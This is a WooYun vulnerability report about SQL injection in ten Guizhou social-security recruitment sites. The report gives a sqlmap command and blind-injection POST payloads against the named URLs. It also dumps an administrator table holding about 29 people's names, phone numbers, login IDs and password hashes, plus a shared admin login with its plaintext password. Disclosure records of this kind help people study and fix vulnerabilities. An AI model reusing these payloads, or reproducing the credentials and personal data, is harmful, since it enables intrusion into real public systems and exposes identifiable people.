漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0132299
漏洞标题:贵州省社保漏洞涉及到10个人力资源和社会保障局(海量资料)
相关厂商:贵州省社保
漏洞作者: 糊涂
提交时间:2015-08-13 15:32
修复时间:2015-09-28 16:10
公开时间:2015-09-28 16:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开
简要描述:
RT
详细说明:
http://www.gzxbm.cn/001/
http://www.gzxbm.cn/002/
http://www.gzxbm.cn/003/
http://www.gzxbm.cn/004/
这样一直到 001 - 010
http://www.gzxbm.cn/010/
10个站
注入:sqlmap.py -u "http://www.gzxbm.cn/001/page_main/att/AttAddFrm.jsp?AID=mail&DOCID=1&FLOWID=mail&TYPE=3" -p DOCID
还有几个post注入
blindsql: POST [kstype => ' and '1'='1] 25% (工作人员查询时间:2015-07-270) (http://www.gzxbm.cn/009/page_main/List1.jsp?kstype=001)
blindsql: POST [kstype => ' and '1'='1] 73% (安顺市西秀区2015年面向社会公开招聘事) (http://www.gzxbm.cn/002/page_main/List1.jsp?kstype=001)
blindsql: POST [SelectedItems => ' and '1'='1] 100% (输入身份证号码长度为18位的数字!");) (http://www.gzxbm.cn/002/page_main/collengine.jsp?SelectedItems=00000001)
blindsql: POST [SelectedItems => ' and '1'='1] 100% (输入身份证号码长度为18位的数字!");) (http://www.gzxbm.cn/009/page_main/collengine.jsp?SelectedItems=00000029)
http://xxq.gzxbm.cn 打开跳转到 http://www.gzxbm.cn/002/
10站的库
所有管理员
UNITID,USERID,LOGINID,DEPTINSIDE,SEX,NAME,PHONE,EMAIL,LCODE,MOBILE,LOGINPW,PAGESIZE,BIRTHDAY,LOGINTIME,USERSTATE,USERIMAGE,ORBERCODE,ONLINEDATE,WINDOWTYPE
010000000000,0100000000000005,13511805291,0,1,陈仕彬,NULL,NULL,8888,13511805291,B70F50A67025438DE4308CB4D04A8442,18,NULL,159,0,121,NULL,04-3月 -15,1
010000000000,0100000000000006,13908521995,0,1,田时光,NULL,NULL,8888,13908521995,A6B2F3B9A2F79BBF89DF310C9C34FC8B,18,NULL,39,0,123,NULL,01-8月 -14,1
00000036b520,00000036b5200001,18188129993,0,1,万力,NULL,NULL,"'1018','1019','1020'",18188129993,3085C7EBA9008D4171D69AC2688F85ED,18,NULL,24,0,114,NULL,04-9月 -14,1
00000042b520,00000042b5200001,18085290999,0,1,廖婧,NULL,NULL,1021,18085290999,EEADD4B3CEA289932EC723B3FCE0FE61,18,NULL,22,0,65,NULL,27-7月 -14,1
00000044b520,00000044b5200001,15186616927,0,1,王碧群,NULL,NULL,1022,15186616927,BE37DAFB3AB95CB8379C1D3DE7BEB131,18,NULL,35,0,114,NULL,26-7月 -14,1
00000046b520,00000046b5200001,18385060037,0,1,焦权,NULL,NULL,"'1023','1024','1025'",18385060037,3124E91DD10370048EF31C39D999AE2A,18,NULL,38,0,15,NULL,04-9月 -14,1
00000054b520,00000054b5200001,13985221128,0,1,吴文凤,NULL,NULL,"'1026','1027','1028'",13985221128,75A7E15DD2A44485FAA3B56774B74DAE,18,NULL,60,0,53,NULL,28-7月 -14,1
00000061b520,00000061b5200001,18984262385,0,1,张红,NULL,NULL,1029,18984262385,EE52FD0C0E0A63267E52FDB8F33EB180,18,NULL,21,0,124,NULL,08-8月 -14,1
00000065b520,00000065b5200001,13985695555,0,1,蒋昭英,NULL,NULL,1030,13985695555,2EBE25DD3A566F36F80D55440D3C3834,18,NULL,24,0,3,NULL,28-7月 -14,1
00000067b520,00000067b5200001,15121340215,0,1,骆礼敏,NULL,NULL,1031,15121340215,6B61B812E5D6358AC7AEA4737F38CC8F,18,NULL,35,0,17,NULL,04-9月 -14,1
00000070b520,00000070b5200001,18108521229,0,1,杨安英,NULL,NULL,1032,18108521229,224C52B7D0B8AB383C8AF8C0E3B9F581,18,NULL,43,0,70,NULL,05-9月 -14,1
00000072b520,00000072b5200001,18685213625,0,1,周泽恩,NULL,NULL,1033,18685213625,79CEF5108D5567C4E786BDE035B9B876,18,NULL,19,0,11,NULL,28-7月 -14,1
00000074b520,00000074b5200001,18285279825,0,1,罗素,NULL,NULL,1034,18285279825,7A574131ED65422181DEAE54516287F1,18,NULL,22,0,72,NULL,04-9月 -14,1
00000076b520,00000076b5200001,18608520505,0,1,翁书义,NULL,NULL,1035,18608520505,A2809E6CDAAB2DAA8D8B6C543FC43B16,18,NULL,23,0,16,NULL,26-7月 -14,1
00000078b520,00000078b5200001,18788637800,0,1,张静玲,NULL,NULL,1036,18788637800,EB72261243EA2A034667EB610581109D,18,NULL,30,0,28,NULL,05-9月 -14,1
00000080b520,00000080b5200001,15348641899,0,1,肖啸,NULL,NULL,"'1037','1038','1039'",15348641899,B4F3AEDEAA32EE9226F91E7BAEEE46B6,18,NULL,42,0,105,NULL,27-7月 -14,1
00000087b520,00000087b5200001,13035509063,0,1,黄代彬,NULL,NULL,"'1040','1041','1042','1043','1044'",13035509063,49ED9B8B767CE581C29C0144A0B1E8BC,18,NULL,20,0,31,NULL,04-9月 -14,1
010000000000,0100000000000003,15985071857,0,1,谭成进,NULL,NULL,8888,15985071857,8FE47DF1F5AF500AE042A8F512ACB3FA,18,NULL,84,0,1,NULL,09-10月-14,1
010000000000,0100000000000004,18788621517,0,1,寇玉梅,NULL,NULL,8888,18788621517,39643F6D2E50712856FDED93B5A21A1E,18,NULL,80,0,66,NULL,06-8月 -14,1
010000000000,0100000000000001,admin,0,1,管理员,NULL,NULL,8888,NULL,AFCD0D8B9FD8846573D3CD0531E02A20,18,NULL,999,0,94,NULL,04-3月 -15,1
010000000000,0100000000000002,designer,0,1,设计员,NULL,NULL,8888,15185182939,4E6C0CC38A346F68E2920F2D3BEF6261,26,30-10月-88,2228,0,99,NULL,03-3月 -15,1
00000008b520,00000008b5200001,18212133081,0,1,孙未章,NULL,NULL,"'1004','1005'",18212133081,12949010B96B092DE07ED764B776B475,18,NULL,17,0,32,NULL,04-9月 -14,1
00000012b520,00000012b5200001,15120359232,0,1,李晶霞,NULL,NULL,"'1006','1007'",15120359232,A624D9566338F80C6E69A3A816C14ACC,18,NULL,41,0,29,NULL,26-8月 -14,1
00000016b520,00000016b5200001,18788602067,0,1,赵宽,NULL,NULL,"'1008','1009'",18788602067,F71F371619943B765807119F1581B8B9,18,NULL,19,0,66,NULL,27-7月 -14,1
00000020b520,00000020b5200001,18685296919,0,1,尹红娇,NULL,NULL,"'1010','1011'",18685296919,0D7E97345F97285FF4A203EADFDF01EC,18,NULL,22,0,52,NULL,29-7月 -14,1
00000024b520,00000024b5200001,18108522335,0,1,朱琳,NULL,NULL,"'1012','1013'",18108522335,94B8D12F72A61D1792D50F8E864D9FC9,18,NULL,43,0,48,NULL,04-9月 -14,1
00000028b520,00000028b5200001,18108521255,0,1,张妮,NULL,NULL,"'1014','1015','1016','1017'",18108521255,979D946BF81BC503C6B3DABE33CC6C6B,18,NULL,30,0,102,NULL,04-9月 -14,1
00000002b520,00000002b5200001,18385067390,0,1,谭应琼,NULL,NULL,1001,18385067390,88175AFC0367AD591BD2BEA6F5C80087,18,NULL,18,0,45,NULL,28-7月 -14,1
00000004b520,00000004b5200001,13985662810,0,1,汪福艳,NULL,NULL,"'1002','1003'",13985662810,2F5258A152811DC0EE94707558BF7D76,18,NULL,28,0,40,NULL,27-7月 -14,1
很多后台 有个通用的 管理员
账号designer 密码 nfzr123321123
还有个很重要的事情 应为我注册过考试 有人给我发的短信
漏洞证明:
很多后台 有个通用的 管理员
账号designer 密码 nfzr123321123
还有个很重要的事情 应为我注册过考试 有人给我发的短信
修复方案:
版权声明:转载请注明来源 糊涂@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-08-14 16:09
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给贵州分中心,由其后续协调网站管理单位处置。
最新状态:
暂无